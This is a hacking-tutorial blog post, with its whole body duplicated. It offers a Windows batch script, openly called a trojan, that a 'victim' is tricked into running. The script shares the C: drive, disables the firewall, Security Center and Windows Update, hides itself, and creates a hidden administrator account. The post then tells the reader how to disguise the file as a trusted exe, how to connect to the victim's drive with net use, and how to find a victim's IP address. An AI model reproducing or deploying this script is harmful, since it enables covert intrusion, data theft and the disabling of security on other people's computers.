A Quick GUide To RAT
What is a RAT?
Well to start off, The term RAT is short for Remote Administration Tool.
A quick definition of a RAT (Remote Administration Tool): RAT’S are used to connect and manage a single or multiple computers with a variety of tools, such as:
* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)
* Registry management (query/add/delete/modify)
* Other product-specific function
Are RATS Legal/Illegal?
Well, It is actually both. There are RATS that are Legal and that are actually Illegal. The difference between them both are the fact that, Legal RATS inform the connected remote that you are on the computer, And Illegal RATS do NOT inform the remote that you are on the computer.
So basically to break things down.
Legal means the person has full control as well, They can kill the connection any time they please, No backdoor is left on their PC, And it is in your network.
Illegal means the person does NOT know you are connected and they have no knowledge you are till you take action, They have no control to kill the connection (unless they unplug the internet), But even then, A backdoor is left on the computer meaning anytime the computer is on and the internet is up, You can connect anytime you want. You can destroy files, Download files, Steal information, Basically make their life miserable.
SO I think till now you must have some basic knowledge of RATs
Now We Headon to Our TuT!
Simply paste the code underneath this into notepad and save it as a .bat file. Or .cmd if you’d like.. Anyways, once your victim has run the file, his firewall and antivirus will be shutdown and an account named ‘admin’ will be created with admin access so.. Yeah.. Under the code you’ll see how to get access..
@echo off
Cls
net share system=C:\ /unlimited
cls
Attrib +r +h C:\windows\startm~1\program\startup\trojan.bat
Cls
net stop SharedAccess
net stop “Security Center”
>>”%Temp%.kill.reg” ECHO REGEDIT4
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg”
del “%Temp%.kill.reg”
del %0
cls
net user Admin /add
net localgroup Administrators /add “Admin”
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “Admin” /t REG_DWORD /d 00 /f
cls
reg add “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ Messenger” /v Start /t REG_DWORD /d 002 /f
cls
net start Messenger
cls
netsh firewall set opmode mode=disable
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “admin” /t REG_DWORD /d 00 /f”
REG add “HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLEREGISTRYTOOLS /T REG_DWORD /D 0 /F”
Cls
A quick definition of a RAT (Remote Administration Tool): RAT’S are used to connect and manage a single or multiple computers with a variety of tools, such as:
* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)
* Registry management (query/add/delete/modify)
* Other product-specific function
Are RATS Legal/Illegal?
Well, It is actually both. There are RATS that are Legal and that are actually Illegal. The difference between them both are the fact that, Legal RATS inform the connected remote that you are on the computer, And Illegal RATS do NOT inform the remote that you are on the computer.
So basically to break things down.
Legal means the person has full control as well, They can kill the connection any time they please, No backdoor is left on their PC, And it is in your network.
Illegal means the person does NOT know you are connected and they have no knowledge you are till you take action, They have no control to kill the connection (unless they unplug the internet), But even then, A backdoor is left on the computer meaning anytime the computer is on and the internet is up, You can connect anytime you want. You can destroy files, Download files, Steal information, Basically make their life miserable.
SO I think till now you must have some basic knowledge of RATs
Now We Headon to Our TuT!
Simply paste the code underneath this into notepad and save it as a .bat file. Or .cmd if you’d like.. Anyways, once your victim has run the file, his firewall and antivirus will be shutdown and an account named ‘admin’ will be created with admin access so.. Yeah.. Under the code you’ll see how to get access..
@echo off
Cls
net share system=C:\ /unlimited
cls
Attrib +r +h C:\windows\startm~1\program\startup\trojan.bat
Cls
net stop SharedAccess
net stop “Security Center”
>>”%Temp%.kill.reg” ECHO REGEDIT4
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg”
del “%Temp%.kill.reg”
del %0
cls
net user Admin /add
net localgroup Administrators /add “Admin”
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “Admin” /t REG_DWORD /d 00 /f
cls
reg add “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ Messenger” /v Start /t REG_DWORD /d 002 /f
cls
net start Messenger
cls
netsh firewall set opmode mode=disable
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “admin” /t REG_DWORD /d 00 /f”
REG add “HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLEREGISTRYTOOLS /T REG_DWORD /D 0 /F”
Cls
OR CLICK HERE TO DOWNLOAD CODING
Now Make the victim to open this file on his machine
you can convert this .cmd/.bat file to exe file and change icon and all other stuff to make victim trust this file!
Okay, so when the victim have run the file, all you have to do is open cmd on your own computer and type in the following:
net use \\IP-of-your-victim admin
Example how to use above command
net use \\192.168.1.1 admin
Followed by the following code:
explorer \\IP-of-your-victim\system
Example how to use above command
explorer \\192.168.1.1\system
So the 2 lines would be like the following:
net use \\192.168.1.1 admin
explorer \\192.168.1.1\system
obvious edit the IPs
PS. If you don’t know how to get the IP off of someone, go onto MSN and send them a file (Eventually do it with the batch file you sent with the RAT) and go into CMD and type in ‘netstat’, then try to identify it.
and i will soonly post a big thread on how to get IP of victim!
Now Make the victim to open this file on his machine
you can convert this .cmd/.bat file to exe file and change icon and all other stuff to make victim trust this file!
Okay, so when the victim have run the file, all you have to do is open cmd on your own computer and type in the following:
net use \\IP-of-your-victim admin
Example how to use above command
net use \\192.168.1.1 admin
Followed by the following code:
explorer \\IP-of-your-victim\system
Example how to use above command
explorer \\192.168.1.1\system
So the 2 lines would be like the following:
net use \\192.168.1.1 admin
explorer \\192.168.1.1\system
obvious edit the IPs
PS. If you don’t know how to get the IP off of someone, go onto MSN and send them a file (Eventually do it with the batch file you sent with the RAT) and go into CMD and type in ‘netstat’, then try to identify it.
and i will soonly post a big thread on how to get IP of victim!
2 comments:
aaaaaaaaaaaaa
how to open other programs
Post a Comment